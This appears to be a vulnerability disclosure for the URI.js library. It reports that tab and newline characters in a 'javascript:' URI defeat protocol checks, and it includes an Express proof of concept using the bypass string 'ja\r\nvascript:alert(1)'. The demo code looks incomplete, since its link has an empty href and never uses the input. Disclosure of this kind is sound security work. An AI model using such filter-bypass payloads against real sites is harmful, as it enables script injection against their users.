\r, \n, \t characters in the URI can lead to XSS as URI.js will fail to extract javascript: protocol from a URI. See Section 4.4 Step 3 “Remove all ASCII tab or newline from input.” of the WHATWG URL spec.
const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000
input = "ja\r\nvascript:alert(1)"
url = parse(input)
console.log(url)
app.get('/', (req, res) => {
if (url.protocol !== "javascript:") {res.send("<a href>CLICK ME!</a>")}
})
app.listen(port, () => {
console.log(`Example app listening on port ${port}`)
})
Run the above and click on the CLICK ME, applications using URI.js to check for javascript: protocol will still be vulnerable to XSS.
This vulnerability is capable of incorrect protocol extraction potentially leading to XSS.